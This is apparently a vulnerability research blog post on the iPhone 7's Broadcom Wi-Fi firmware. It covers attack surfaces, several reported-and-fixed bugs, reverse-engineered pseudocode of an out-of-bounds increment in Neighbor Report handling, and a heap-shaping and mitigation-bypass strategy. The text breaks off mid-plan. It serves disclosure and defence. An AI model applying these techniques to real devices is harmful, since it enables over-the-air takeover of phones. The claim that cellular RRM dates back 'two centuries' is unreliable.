In this blog post we’ll continue our journey towards over-the-air exploitation of the iPhone, by means of Wi-Fi communication alone. This part of the research will focus on the firmware running on Broadcom’s Wi-Fi SoC present on the iPhone 7.
We’ll begin by performing a deep dive into the firmware itself; discovering new attack surfaces along the way. After auditing these attack surfaces, we’ll uncover several vulnerabilities. Finally, we’ll develop a fully functional exploit against one of the aforementioned vulnerabilities, thereby gaining code execution on the iPhone 7’s Wi-Fi chip. In addition to gaining code execution, we’ll also develop a covert backdoor, allowing us to remotely control the chip over-the-air.

Along the way, we’ll come across several new security mechanisms developed by Broadcom. While these mechanisms carry the potential to make exploitation harder, they remained rather ineffective in this particular case. By exploring the mechanisms themselves, we were able to discover methods to bypass their intended protections. Nonetheless, we remain hopeful that the issues highlighted in this blog post will help inspire stronger mitigations in the future.
All the vulnerabilities presented in this blog post (#1, #2, #3, #4, #5) were reported to Broadcom and subsequently fixed. I’d like to thank Broadcom for being highly responsive and for handling the issues in a timely manner. While we did not perform a full analysis on the breadth of these issues, a minimal analysis is available in the introduction to the previous blog post.
And now, without further ado, let’s get to it!Exploring The Firmware
Combining the extracted ROM image we had just acquired with the resident RAM image, we can finally piece together the complete firmware image. With that, all that remains is to load the image into a disassembler and begin exploring.
While the ROM image on the BCM4355C0 is slightly larger than that of previously analysed Android-resident Wi-Fi chips, it’s still rather small (spanning only 896KB). Consequently, Broadcom has once again employed the same tricks in order to conserve as much memory as possible; including compiling the bulk of the code using the Thumb-2 instruction set and stripping away most of the symbols.
As for the ROM’s layout, it follows the same basic structure as that of its Android counterparts; beginning with a code chunk, followed by a blob of constant data (including strings and CRC polynomials), and ending with “trampolines” into detection points in the Wi-Fi firmware’s RAM (and some more spare data).

The same cannot be said of the RAM image; while some similarities exist between the current image and the previously analysed ones, their internal layouts are substantially different. Whereas Android-resident firmwares contained interspersed heap chunks between code and data blobs, this quirk is no longer present in the current RAM image. Instead, the heap chunks are mostly placed in a linear fashion. One exception to this rule is the initialisation code present in the RAM -- once the firmware’s bootup process completes, this blob is reclaimed, and is thereafter converted into an additional heap chunk.

Curiously, the stack is no longer located after the heap, but rather precedes it. This modification has the advantage of preventing potential collisions between the stack and the heap (which were possible in previous firmware versions).
To further our understanding of the firmware, let’s attempt to identify the set of supported high-level features. While ROM images typically contain a wealth of features, not all OEMs choose to utilise every single feature. Instead, the supported features are governed by the RAM’s contents, which selectively adds support for the capabilities chosen by the OEM.
In the context of Android-resident firmware images, identifying the supported features was made easier due to the inclusion of “feature tags” within the version string embedded in the firmware’s RAM image. Each tag indicated support for a corresponding feature within the firmware image. Unfortunately, the iPhone’s Wi-Fi firmware images made away with the detailed version strings, and instead opted for a generic string containing the build type and the chip’s revision:

Nevertheless, we can still gain some insight into the firmware’s feature set, by reverse-engineering the firmware itself. Let’s take a look inside and see what we can find!It’s Bigger On The Inside
Although most symbols have been stripped from the firmware’s ROM image, whatever symbols remain hint at the features supported by the image. Indeed, going over the strings in the combined image (mostly the ROM, the RAM is nearly devoid of strings), we come across many of the features we’ve identified in the past. Surprisingly, however, we also find a great deal of new features.
While adding features can (sometimes) result in better user experience, it’s important to remember that the Wi-Fi chip is a highly privileged component.
First, as a network interface, the chip has access to all of the host’s Wi-Fi traffic (both inbound and outbound). Therefore, attackers controlling the Wi-Fi firmware can leverage this vantage point to inject or manipulate data viewed by the host. One avenue of attack would therefore be to manipulate the host’s unencrypted web traffic and insert a browser exploit, allowing attackers to gain control over the corresponding process on the host. Other applications on the host which rely on unencrypted communications may be similarly attacked.
In addition to the aforementioned attack surface, the Wi-Fi firmware itself can carry out attacks against the host. As we’ve seen in previous blog posts, the chip communicates with the host using a variety of control messages and through a privileged physical interface (e.g., PCIe); if we were to find errors in the host’s processing of any of those, we might be able to take over the host itself (indeed, we’ll carry out such attacks in the next blog post!).

Due to the above risks, it’s important that the TCB constituted by the Wi-Fi chip remain relatively small. Any components added to the Wi-Fi firmware carry the risk of vulnerabilities being introduced into the firmware which would subsequently allow attackers to assume control over the chip (and perhaps even the entire system).
This risk is compounded by the fact that the firmware employs far fewer defence mechanisms than modern operating systems. Most notably, it does not employ ASLR, does not have stack cookies and fails to implement safe heap unlinking. Therefore, even relatively weak primitives may be exploitable within the Wi-Fi firmware (in fact, we’ll see just such an example later on!).
With that in mind, let’s take a look at the features present in the Wi-Fi firmware. It’s important to note that the mere presence of these code paths in the firmware does not imply that they are enabled by default. Rather, in most cases the host chooses whether to enable specific features, depending on user or network related configurations.Apple-Specific Features
After some preliminary exploration, we come across a group of unfamiliar strings referencing a feature called “AWDL”. This acronym refers to “Apple Wireless Direct Link”; an Apple-specific protocol designed to provide peer-to-peer connectivity, notably used by AirDrop and AirPlay. The presence of Apple-specific functionality within the ROM affirms the suspicion that these Wi-Fi chips are used exclusively by Apple devices.
From a security perspective, it appears that the attack surface exposed by this functionality within the Wi-Fi firmware is rather limited. The firmware contains mechanisms for the configuration of AWDL-related features, but such operations are driven primarily by host-side logic (via AppleBCMWLANCore and IO80211Family).
Moving right along, we come across another group of unexpected strings:

This code originates from mDNSResponder, Apple’s open-source implementation of Multicast DNS (a standardised zero-configuration service commonly used within the Apple ecosystem).
Reverse-engineering the above fragments, we come to the realisation that it is a stripped-down version of mDNSResponder, mostly responsible for performing wake on demand via mDNS (for networks that include a Bonjour Sleep Proxy). Consequently, it does not offer all the functionality provided by a fully-fledged mDNS client. Nonetheless, embedding code from complex libraries such as mDNSResponder could carry undesired side effects.
For starters, mDNSResponder itself has been affected by several security issues in the past. More subtly, non-security bugs in libraries can become security-relevant when migrating between systems whose characteristics differ so widely from one another. Concretely, on the Wi-Fi chip address zero points to the firmware’s interrupt vectors -- a mapped, writable address. Being able to modify this address would allow attackers to gain code-execution on the chip, thereby converting a class of “benign” bugs, such as a null-pointer accesses, to RCEs.
Offloading Mechanisms
Since the Wi-Fi SoC’s ARM core is less power-hungry than the application processor, it stands to reason that some network related functionality be relegated to the firmware, when possible. This concept is neither new, nor is it unique to the mobile settings; offloading to the NIC occurs in desktop environments as well, primarily in the form of TCP offloading (via TOE) .
Regardless, while the advantages of offloading are clear, it’s important to be aware of the potential downsides as well. For starters, as we’ve mentioned before, the more features are added into the Wi-Fi firmware, the less auditable it becomes. Additionally, offloading features often require parsing of high-level protocols. Since the Wi-Fi firmware does not contain its own TCP/IP stack, it must resort to parsing all layers in the stack manually, up to the layer at which the offloading occurs.
Inspecting the firmware reveals at least two features which allow offloading of high-level protocols to the Wi-Fi firmware: ICMPv6 offloading and TCP KeepAlive offloading. Apple’s host-side drivers contain controls for enabling and disabling these offloading features (see AppleBCMWLANCore), subsequently handing over control over these packets to the Wi-Fi firmware rather than the host.
While beyond the scope of this blog post, auditing both of the aforementioned offloading features revealed two security bugs allowing attackers to either leak constrained data from the firmware or to crash the firmware running on the Wi-Fi SoC (for more information see the bug tracker entries linked above). Generic Attack Surfaces
While the aforementioned attack surfaces may be interesting from an exploratory point of view, each of the outlined features was rather constrained in scope. Perhaps, we could find a more fruitful attack surface within the Wi-Fi firmware?
...This is where some familiarity with the Wi-Fi standards comes in handy!
Wi-Fi frames can be split into three distinct categories. Each frame is assigned a category by inspecting the “type” and “subtype” fields in its MAC header:

The categories are as follows:
  • Data Frames - Carry data (and QoS data) over the Wi-Fi network.
  • Control Frames - Body-less frames assisting with the delivery of other frames (using ACKs, RTS/CTS, Block ACKs and more).
  • Management Frames - Perform complex operations, including connecting to a network, modifying the state of individual stations (STAs), authenticating and more.

Let’s take a second to consider the categories above from a security PoV.
While data frames contain interesting attack surfaces (such as frame aggregation via A-MSDU/A-MPDU), they hide little complexity otherwise. Conversely, features present directly on the RX-path, such as the aforementioned offloading mechanisms, are generally also accessible through data frames, thereby increasing the exposed attack surface. Control frames, on the other hand, offer limited complexity and therefore do not significantly contribute to the attack surface.
Unlike the first two categories, management frames are where the majority of the firmware’s complexity lays. Many of the mechanisms encapsulated by management frames make for interesting targets in their own right; including authentication and association. However, we’ll choose to focus on one subtype offering the largest attack surface of all -- Action Frames.
Most of the logic behind “advanced” Wi-Fi features (such as roaming, radio measurements, etc.) is implemented by means of Action Frames. As their name implies, these frames trigger “actions” in stations within the network, potentially modifying their state.
Curiously, unlike data frames, management frames (and therefore action frames as well) are normally unencrypted, even if networks employ security protocols such as WPA/WPA2. Instead, certain management frames can be encrypted by enabling 802.11w Protected Management Frames. When enabled, 802.11w allows for confidentiality of those frames’ contents, as well as a form of replay protection.
Summing up, action frames constitute a large portion of the attack surface -- they are mostly unprotected frames, using which state-altering functionality is carried out. To discover the exact extent of their exposed attack surface, let’s explore those frames in more depth.Action Frames
Consulting IEEE 802.11-2016 (9-47), full list of action frame categories is quite formidable:

To illustrate the amount of complexity encapsulated by action frames, let’s return to the iPhone’s Wi-Fi firmware. Tracing our way through the RX-path, we quickly reach the function at which action frames are handled within the firmware (referred to as “wlc_recv_mgmtact” in the ROM):
wlc_recv_mgmtact - 0x1A79F4
As we can see, the function performs some preliminary operations, before handing off processing to one of the numerous handlers within the firmware. Each action frame category is delegated to a single handler. Counting the action frame handlers and corresponding frame types supported by the iPhone’s firmware, we find 13 different supported categories, resulting in 34 different supported frame types. This is a substantial attack surface to explore!
To assess the handlers’ security, we’ll reverse-engineer each of the above functions. While this is a slow and rather tedious process, recall that each vulnerability found in the above handlers implies a triggerable over-the-air vulnerability in the Wi-Fi chip.
Before attempting a manual audit, we also “fuzzed” the action frame handlers. To do so, we developed an on-chip Wi-Fi fuzzer, allowing injection of frames directly into the aforementioned handler functions (without transmitting the frames over-the-air). While the fuzzer allowed for high-speed injection of frames (namely, thousands of frames per second), running it using a small corpus of action frames and inducing bit-flips in them was unfruitful... One possible explanation for this approach’s failure is due to the strict structure mandated by many action frames. Perhaps these results could be improved by fuzzing based on a grammar derived from the Wi-Fi standard, or enforcing structure constraints on the fuzzed content.

Regardless, we can employ some tricks to speed up our manual exploration. Recall that Wi-Fi primarily relies on Information Elements (IEs), tagged bundles of data, to convey information. The same principle applies to action frames -- their payloads typically consist of multiple IEs, each encapsulating different pieces of information relating to the handled frame. As the IE tags are (mostly) unique within the Wi-Fi standard, we can simply lookup the tag value corresponding to each processed IE, allowing us to quickly familiarise ourselves with the surrounding code.
After going through the handlers outlined above, we identified a number of vulnerabilities.
First, we discovered a vulnerability in 802.11v Wireless Network Managements (WNM). WNM is a set of standards allowing clients to configure themselves within a wireless network and to exchange information about the network’s topology. Within the WNM category, the “WNM Sleep Mode Response” frame serves to update the Group Temporal Key (GTK) when the set of peers in the network changes. As it happens, reverse-engineering the WNM handler revealed that the corresponding function failed to verify the length of the encapsulated GTK, thereby triggering a controlled heap overflow (see the bug tracker for more information).
By cross-referencing the GTK handling method, we were able to identify a similar vulnerability in 802.11r Fast BSS Transition (FBT). Once again, the firmware failed to verify the GTK’s length, resulting in a heap overflow.
While both of the above vulnerabilities are interesting in their own right, we will not discuss them any further in this blog post. Instead, we’ll focus on a different vulnerability altogether; one with a weaker primitive. By demonstrating how even relatively “weak” primitives can be exploited on the Wi-Fi firmware, we’ll showcase the need for stronger exploit mitigations.
To make matters more interesting, we’ll construct our entire exploit using nothing but action frames. These frames are so feature-rich, that by leveraging them we will be able to perform heap shaping, create allocation primitives, and of course, trigger the vulnerability itself.802.11k Radio Resource Management
802.11k is an amendment to the Wi-Fi standard aiming to bring Radio Resource Management (RRM) capabilities to Wi-Fi networks. RRM-capable stations in the network are able to perform radio measurements (and receive them), allowing access points to reduce the congestion and improve traffic utilisation in the network. The concept itself is not new in the mobile sphere; in fact, it’s been around in cellular networks for over two centuries.
Within the Wi-Fi ecosystem, RRM is commonly utilised in tandem with 802.11r FBT (or the proprietary CCKM) to enable seamless access point assisted roaming.  As stations decide to “handover” to different access points (based on their radio measurements), they can consult the access points within the network in order to obtain a list of potential neighbours with which they may reassociate.
To implement all of the above, a set of action frames (and a new action category) have been added to the Wi-Fi standard. Consequently, clients can perform radio and link measurement requests, receive the corresponding reports, and even process reports containing their neighbouring access points (should they decide to roam).
All of the above functionality is also present in the Wi-Fi firmware on the iPhone:

Auditing the handlers above, we come across one function of particular note; the handler for Neighbor Report Response frames.The Vulnerability
Neighbor Report Response (NRREP) frames are reports delivered from the access point to stations in the network, informing stations of neighbouring access points in their vicinity. Upon roaming, the stations may use these parameters to reassociate with the aforementioned neighbours. Providing this information spares the stations the need to perform extensive scans on their own -- a rather time consuming operation. Instead, they may simply rely on the report, informing it of the specific channels and operating classes inhabited by each neighbour.
Like many action frames, NRREPs also contain a “dialog token” ( This 1-byte field is used to correlate between requests issued by a client, and their corresponding responses. As their name implies, Neighbour Report Responses are typically transmitted in response to a corresponding request made by the client earlier on (commonly as a result of a radio measurement indicating that a roam may be imminent). As we’d expect, upon sending a Neighbor Report Request, the client generates and embeds a dialog token, which in later verified by it when processing the corresponding NRREP returned by the access point.
However, reading more carefully through the specification reveals another interesting scenario! It appears that NRREPs may also be entirely unsolicited. In such a case, the dialog token is simply set to zero, indicating that no matching request exists.
IEEE 802.11-2016,
Consequently, NRREPs may be transmitted over the network to any client at any time, so long as it supports 802.11k RRM. Upon reception of such a report (with a zeroed dialog token), the client will simply parse the request and handle the data therein.
Continuing to read through the standard, we can piece together the frame’s overall structure; starting from the action frame header, all the way the encapsulated IE:

As we can see above, the bulk of the data in the NRREP frame is conveyed through the “Neighbour Report” IE. NRREPs may contain one or more such IEs, each indicating the presence of a single neighbour.
Now that we have a firm understanding of the frame’s structure, let’s take a look at the firmware’s implementation of the functionality described above. Following along from the initial NRREP handler, we quickly come to a ROM function responsible for handling the reports. Reverse-engineering the function, we arrive at the following high-level logic:
1.  int wlc_rrm_recv_nrrep(void* ctx, ..., uint8_t* body, uint32_t bodylen) {2.3.     //Ensuring the request is valid3.     if (bodylen <= 2 || !g_rrm_enabled || body[2] != stored_dialog_token)4.         ... //Handle error5.6.     //Freeing all the previously stored reports7.     free_previous_nrreps(ctx, ...);8. 9.     //Stripping the action Header10     uint8_t* report_ie = body + 3;11.    bodylen -= 3; 12.13.    //Searching for the report IE14.    do {15.        ... //Verify the IE is valid16.        if (report_ie[0] == 52 && report_ie[1] > 0xC) //Tag, Length17.            break; //Found a matching IE!18.    } while (report_ie = bcm_next_tlv(report_ie, &bodylen));19.    if (!report_ie)20.        ... //Handle error21.    22.    //Handle the report23.     uint8_t* nrrep_data = malloc(28);24.     if (!nrrep_data)25.         ... //Handle error26.27.     memcpy(nrrep_data + 6, report_ie + 2, 6); //Copying the BSSID28.     ...                                       //Copying other elements...29.     nrrep_data[16] = report_ie[12];           //Operational Class30.     nrrep_data[17] = report_ie[13];           //Channel Number31.32.     //Processing the report33.     void* elem = wlc_rrm_regclass_neighbor_count(ctx, nrrep_data, ...);34.     ...35. }
As we can see above, the function begins by performing some cursory validation of the received request. Namely, it ensures that RRM is enabled within the network, that the report is sufficiently long, and that the received dialog token matches the stored one (if a solicited request was initiated by the client, otherwise the stored token is set to zero).
After performing the necessary validations and locating the report IE, the function proceeds to extract the encoded report information and store it within a structure of its own. Finally, the newly created structure is passed on for processing within wlc_rrm_regclass_neighbor_count. Let’s take a closer look:
1.  void* wlc_rrm_regclass_neighbor_count(void* ctx, uint8_t* nrrep_data, ...) {2.3.      //Searching for previous stored elements with the same Operational4.      //Class and Channel Number5.      if (find_nrrep_buffer_and_inc_channel_idx(ctx, nrrep_data, ...))6.          return NULL;7.      8.      //Creating a new element to hold the NRREP data9.      uint8_t* elem = zalloc(456);10.     if (!elem)11.         ... //Handle error12.     elem[4] = nrrep_data[16];                  //Operational Class13.     ((uint16_t*)(elem + 6))[nrrep_data[17]]++; //Channel Number14. 15.     //Adding the element to the linked list of stored NRREPs16.     *((uint8_t**)elem) = ctx->previous_elem;17.     ctx->previous_elem = elem;18.     return elem;19. }
As shown in the snippet above, the firmware keeps a linked list of buffers, one per “Operational Class”. Each buffer is 456 bytes long, and contains the operational class, an array holding the number of neighbours per channel, and a pointer to the next buffer in the list.
While not shown above, find_nrrep_buffer_and_inc_channel_idx performs a similar task - it goes over each element in the list, looking for an entry matching the current operational class. Upon finding a matching element, it increments the neighbour count at the index corresponding to the given channel number, and returns 1, indicating success.
So why are these handlers interesting? Consider that valid 802.11 channel numbers range from 1-14 in the 2.4GHz spectrum, all the way up to 196 in the 5GHz spectrum. Since each neighbour count field in the array above is 16-bits wide, we can deduce that the neighbour count array can be used to reference channel numbers up to 224 ((456 - 6)/sizeof(uint16_t) == 224).
However, looking a little closer it appears that the functions above make no attempt to validate the Channel Number field! Therefore, malicious attackers can encode whatever value they desire in that field (up to 255). Encoding a value larger than 224 will therefore trigger a 16-bit increment to be performed out-of-bounds (see line 13), thereby corrupting memory after the NRREP buffer!Understanding The Primitive
Before we move on, let’s take a second to understand the exploit primitive -- as mentioned above, we are able to perform 16-bit increments (which are also 16-bit aligned), spanning up to 60 bytes beyond our allocated buffer.
Oddly, while the standards specify that each NRREP may contain several encoded reports (each of which should be handled by the receiving station), it appears that the handler functions above only processes a single IE at a time. Therefore, each NRREP we send will be able to trigger a single OOB increment.
This last fact ties in rather annoyingly with another quirk in the firmware’s code -- namely, upon reception of each NRREP, the list of stored NRREP elements is freed before proceeding to process the current element (see line 7, where free_previous_nrreps is invoked). It remains unclear whether this is intended behaviour or a bug, but the immediate consequence of this oddity is that following each OOB increment, the buffers are subsequently freed, allowing other objects to take their place.
Lastly, the reception of each NRREP triggers two allocations of distinct sizes; one for the linked list element (456 bytes), and another to store the report’s data (28 bytes). As a result, any heap shaping or grooming we’ll perform will have to take both allocations into consideration.Triggering The VulnerabilityConfiguring The Network
To begin developing our exploit, we’ll use the same test network environment we described in the previous blog post, using the following topology:

As we’re going to leverage NRREPs, it’s important to set up our test network to support neighbour reports. Like many auxiliary Wi-Fi features, support for NRREPs is indicated by setting the corresponding bit in the capability IEs broadcast in the network’s beacon. RRM-related functionality is encoded using the “RM Enabled Capabilities” information element.
Since we’re using hostapd to broadcast our network, we’ll enable the rrm_neighbor_report setting in our network’s configuration. Enabling this feature should set the corresponding field in the “RM Enabled Capabilities” IE to indicate support for neighbour reports. Let’s inspect a beacon frame to make sure:

Alright, seems like our network configuration is valid! Next, we’ll want to construct an interface allowing us to send arbitrary neighbour reports to peers in the network.
To do so, we’ll extend hostapd by adding new commands to its control interface. Each new command will correspond to a single frame type we’d like to inject. After adding our code to hostapd, we can simply connect to the control interface and issue the corresponding commands, thereby triggering the transmission of the requested frames from the access point to the selected peer. You can find our patches to hostapd in the exploit bundle on the bug tracker.

It should be noted that this approach is not infallible. Since we’re utilising a SoftMAC dongle to transmit our internal network, the SoftMAC layer of the Linux Kernel is responsible for some of the MLME processing done on the host. Therefore, it’s possible that processing done by this layer will interfere with the frames we wish to send (or receive) during the exploit’s flow. To get around this limitation, we’ve taken care to construct the frames in a manner that does not clash with Linux’s SoftMAC stack. Sending NRREPs
After configuring and broadcasting our network, we can finally attempt to trigger the vulnerability itself. This brings us to a rather important question; how will we know whether the vulnerability was triggered successfully or not? After all, a single 16-bit increment may be insufficient to cause significant corruption of the firmware’s memory. Therefore it’s entirely possible that while the OOB access will occur, the firmware will happily chug along without crashing, leaving no observable effects indicating the vulnerability was triggered.
Remembering our Wi-Fi debugger from the previous blog post, one course of action immediately springs to mind -- why not simply hook the NRREP processing function with our own handler, and see whether our handler is invoked upon transmitting a malicious NRREP? This is easier said than done; it turns out most of the NRREP handling functionality (especially the actual vulnerability trigger, which we’re interested in) is located within the ROM, preventing us from inserting a hook.
As luck would have it, a new feature developed by Broadcom can be leveraged to solve this issue. To allow tracing different parts of the firmware’s logic, including the ROM, Broadcom have introduced a set of logging functions embedded throughout the firmware. Curiously, this mechanism was not present in the Android-resident firmwares we had analysed in the past.
Reverse-engineering this mechanism, it appears to operate in the following manner: each trace is assigned an identifier, ranging from 0x0 to 0x50. When a trace is requested, the firmware inspects an internal array of the same size stored in the firmware’s RAM, to gage whether the trace with the given identifier has been enabled or not. Each identifier has a corresponding 8-bit mask representing the types of traces enabled for it. As we are able to access the firmware’s RAM, we can simply enable any trace we like by setting the corresponding bits in the trace array. Subsequently, traces with the same ID will be outputted to the firmware’s console, allowing us to handily dump them using our Wi-Fi firmware debugger.

This functionality has also been incorporated into our Wi-Fi debugger, which exposes functions to read and modify the log status array as well as API to read out the firmware’s console.
Using the above API, we can now enable the traces referenced in the NRREP’s ROM handlers. Taking a closer look at the NRREP handling function in the firmware, we come across the following traces:

Alright, so we’ll need to enable log identifier 0x16 to observe these traces. After enabling the trace, sending an NRREP and reading out the firmware’s console, we are greeted with the following result:

Great! Our traces are being hit, indicating that the NRREP is successfully received by the station. With that, let’s move on to the next step - devising an exploit strategy.An Exploit StrategyUnderstanding The Heap
Since the vulnerability in question is a heap memory corruption, it’s important that we take a second to familiarise ourselves with the allocator’s implementation. In short, it is a “best-fit” allocator, which performs forward and backward coalescing, and keeps a singly linked list of free chunks. When chunks are allocated, they are carved from the end (highest address) of the best-fitting free chunk (smallest chunk that is large enough).
Free chunks consist of a 32-bit size field and a 32-bit “next” pointer, followed by the chunk’s contents. In-use chunks contain a single 32-bit size field, of which the top 30 bits denote the chunk’s size, and the bottom 2 bits indicate status bits. Putting it together, we arrive at the following layout:Sketching An Exploit Strategy
Before we rush ahead, let’s begin by devising a strategy. We already know that our exploit primitive allows us to perform 16-bit increments, spanning up to 60 bytes beyond our allocated buffer.

It’s important to note that the heap’s state, perhaps surprisingly, is incredibly stable -- little to no allocations are performed. What little allocations are made, are immediately freed thereafter. As for frames carrying traffic (received or transmitted); they are not carved from the heap, but rather drawn from a special “pool”. As such, the presence of traffic should not affect the heap’s state.
The heap’s stability is a double-edged sword; on the one hand, we are guaranteed relative convenience when shaping and modifying the heap’s state, as no allocations other than our own will interfere with the heap’s structure. On the other hand, the set of allocations that can be made (and subsequently, targeted by us using the vulnerability primitive) is limited.
Indeed, going over the action frame handlers and searching for objects which may serve as viable targets for modification, we come up empty handed. The only data types that may be allocated either store their “interesting” data farther than 56 bytes away from their origin (accounting for the in-use chunk’s header), or simply do not contain “interesting” data for modification.
Perhaps, instead, we could leverage the heap itself to hijack the control flow? If we were able to hijack the “next” pointer of a free chunk and subsequently point it at a location of our choosing, we could overwrite the target address with a subsequent allocation’s contents. This prospect sounds rather alluring, so let’s try and pursue this route.Writing An ExploitHijacking A Free Chunk
To hijack a free chunk, we’ll need to commandeer a chunk’s “next” pointer. Recall that our exploit primitive allows us some degree of control over neighbouring data structures. As such, let’s consider the following placement in which a free chunk is within range of the NRREP buffer:

Leveraging our OOB increment, we can directly modify the chunk’s “next” pointer by sending an NRREP request with the corresponding channel number. Naively, this would allow us to gain control over a free chunk in the heap, by simply directing the “next” at a location of our choosing.
However, this approach turns out to be infeasible.
In order to direct the “next” pointer at a meaningful address, we’d have to either know its value in advance (in order to calculate the number of increments required to convert the pointer from its current value to the target value), or we’d have to know the relative offset between its current value and the desired target.
As we do not know the exact addresses of heap chunks (nor would we want to resort to guessing them), the former option is ruled out. What about the latter approach? Recall that our primitive allows for 16-bit increments. Therefore, we can either increase the pointer’s value by 1 (by increment the bottom half word), or by 65536 (by incrementing the top half word).
Incrementing the pointer by 1 will result in an unaligned chunk address in the freelist. Recall, however, that our vulnerability primitive triggers deallocations on every invocation. As it happens, the allocator’s “free” function validates that each chunk in the freelist is aligned. When an unaligned block in encountered, it generates a fault and halts the firmware. Thus, an increment on of bottom half-word will result in the firmware crashing.
Incrementing the top half-word similarly fails; since all the heap’s chunks are less than 65536 away from the RAM’s end address, incrementing the top half-word will result in the “free” function attempting to access memory beyond the RAM, triggering an access violation and halting the firmware.
So how can we commandeer a free chunk nevertheless?
To do so we’ll need to use a more subtle approach - instead of modifying the free chunk’s contents directly, we’ll aim to achieve a layout in which two free chunks overlap one another, thereby causing allocations carved from one chunk to overwrite the metadata of the other (leading to control over the latter’s “next” pointer).

Heap Shaping
Achieving a predictable heap layout is key for a reliable exploit. As our current goal is to create a specific layout (namely, two overlapping heap chunks), we require setting up the heap in a manner which would allow us to achieve such a layout.
Classically, heap shaping is performed by leveraging primitives allowing for control either over an allocation’s lifetime, or optionally over the allocation’s size. Triggering allocations within the heap without immediately freeing them, allows us to fill “holes” in the heap, leading to a more predictable layout.
The allocator used in the firmware is a “best-fit” allocator which allocates from high addresses to lower ones. Consequently, if all “holes” in the heap of a certain size are filled, subsequent allocations of the same size (or larger) would be carved from the best-fitting chunk, proceeding from top to bottom, thus creating a linear allocation pattern.
To understand the Wi-Fi firmware’s heap layout, let’s take a snapshot of the heap’s state using our Wi-Fi debugger (repeating the process multiple times to account for any variability in the state):

As we can see, several small chunks are strewn across the heap, alongside a single large chunk. From the structure above, we can deduce that in order to create a predictable allocation pattern for our NRREP buffer, we’d simply need a shaping primitive allowing us to fill all the “holes” whose sizes match that of the NRREP buffer.
However, this is easier said than done. As we’ve mentioned before, little allocations occur during routine operations, and those that do are immediately freed thereafter. Combing through all the action frame handlers, we fail to find even a single instance of a memory leak (i.e., an allocation with infinite lifetime), or even an allocation that persists beyond the scope of the handlers themselves. Be that as it may, we do know of one mechanism, governed by action frames, which could offer a solution.
Normally, each Wi-Fi frame received by a station is individually acknowledged by transmitting a corresponding acknowledgement frame in response. However, many use-cases exist in which multiple frames are expected to be sent at the same time; requiring an acknowledgement for each individual frame in those cases would be rather inefficient. Instead, the 802.11n standard (expanding on 802.11e) introduced “Block Acknowledgements” (BA). Under the new scheme, stations may acknowledge multiple frames at once, by transmitting a single BA frame.
To utilise BAs, a corresponding session must first be constructed. This is done by transmitting an ADDBA Request (IEEE 802.11-2016, from the originating peer to the responder, resulting in an ADDBA Response ( being sent in the opposite direction, acknowledging a successful setup. Similarly, BAs can be torn down by sending a DELBA frame, indicating the BA should no longer be active. Each BA is identified by a unique Traffic Identifier (TID). While the standard specifies up to 16 supported TIDs, the firmware only supports the first 8, restricting the number of BAs possible in firmware to the same limit.

Since the lifetime of BAs is explicitly controlled by the construction of the corresponding BA sessions, they may constitute good heap shaping candidates. Indeed, going over the corresponding action frame handler in the firmware, it appears that every allocated BA results in a 164-byte allocation being made, holding the BA’s contents. The allocation persists until the corresponding DELBA is received, upon which the BA structure corresponding to the given TID is freed.
To use BAs in our network, we’ll add a new command to hostapd, allowing injection of both ADDBA and DELBA requests with crafted TIDs. Furthermore, we’ll take care to compile hostapd with support for 802.11n (CONFIG_IEEE80211N) and to enable it in our network (ieee80211n).
Putting the above together, we arrive at a pretty powerful heap shaping primitive! By sending ADDBA Requests, we can trigger the allocation of up to eight distinct 164-byte allocations. Better yet, we can selectively delete the allocations corresponding to each BA by sending a DELBA frame with the corresponding TID.
Having said that, two immediate downsides also spring to mind. First, the allocation size is fixed, therefore we cannot use the primitive to shape the heap for allocations smaller than 164 bytes. Secondly the contents of the BA buffers are uncontrolled by us (they mostly contain bit-fields used for reordering frames in the BA).Attempting Overlapping Chunks
Using our shiny new shaping primitive, we can now proceed to shape the heap in a manner allowing the creation of overlapping chunks. To do so, let’s begin by allocating all the BAs, from 0 through 7. The first few allocations will fill in whatever holes can accommodate them within the heap. Subsequently, the rest of the allocations will be carved for the main heap chunk, advancing linearly from high addresses to lower ones.
(Grey blocks indicate free chunks)
Quite conveniently, as the allocation primitive is much larger than the “small buffer” allocated during the NRREP request, it allows the smaller holes in the heap, those large enough to hold the 28 byte allocation, to persist. Consequently, the “smaller buffer” is simply carved from one of the remaining holes, allowing us to safely ignore it.
Getting back to the issue at hand - in order to create an overlapping allocation, all we’d need to do is use the vulnerability primitive to increment the size field of one of the BAs. After growing the size by whichever amount we desire, we can proceed to delete the newly expanded BA, along with its neighbouring BAs, causing an overlapping allocation.

Unfortunately, running through the above scenario results in a resounding failure -- the firmware crashes upon any attempt to free a block causing an overlapping allocation…
To get down to the bottom of this odd behaviour, we’ll need to locate the source of the crash. Inspecting the AppleBCMWLANBusInterfacePCIe driver, it appears that whenever a trap is generated by the firmware, the driver simply collects the aforementioned crash data, and outputs it to the device’s syslog. Therefore, to inspect the crash report, we’ll simply dump the syslog using idevicesyslog. After generating a crash we are presenting with the following output:
Inspecting the source address of the crash in the firmware’s image, we come across an unfamiliar block of code in the “free” function, which was not present in prior firmware versions. In fact, the entire function seems to have many of these blocks… To understand this new code, let’s dig a little deeper.New Mitigations
Going over the allocator’s “free” function, we find that in addition to freeing the blocks themselves, the function now performs several additional verifications on the heap’s structure, meant to ensure that it is not corrupted in any way. If any violations are detected, the firmware calls an “abort” function, subsequently causing the firmware to crash.
After reverse-engineering all the above validations, we arrive at the following list of mitigations:
  1. The chunk’s bounds are compared against a pre-populated list of “allowed” regions.
  2. The chunk is compared against all other chunks in the freelist, searching for overlaps.
  3. The chunk is checked against a list of “disallowed” regions.
  4. The chunk is ensured to be 4-byte aligned.

If any violation is detected, the firmware triggers the “abort” function, thereby halting execution.
It appears that Broadcom has done some hardening on the allocator! This is great from a security perspective, but rather bleak news for our exploit, as it appears that any attempt to create an overlapping pair of chunks will result in a crash. Perhaps we’re out of luck…
Bypassing Mitigation #1
...Or are we?
Instead of first increasing a heap block’s size, then freeing it to create overlapping chunks, let’s opt for different approach. We’ll arrange for the following layout; first, we’ll create two free chunks, which are not immediately adjacent to one another (to prevent the allocator from coalescing them). Then we’ll use the NRREP primitive to slowly increment the size of one block, until it overlaps the other.
However, as the NRREP primitive only allows us to modify data extending up to 60 bytes after the buffer, and each BA buffer is much larger in size (164 bytes), we’ll first need to devise a plan to get our NRREP buffer closer to a free chunk, without it actually impeding on the chunk (and thereby coalescing with it).
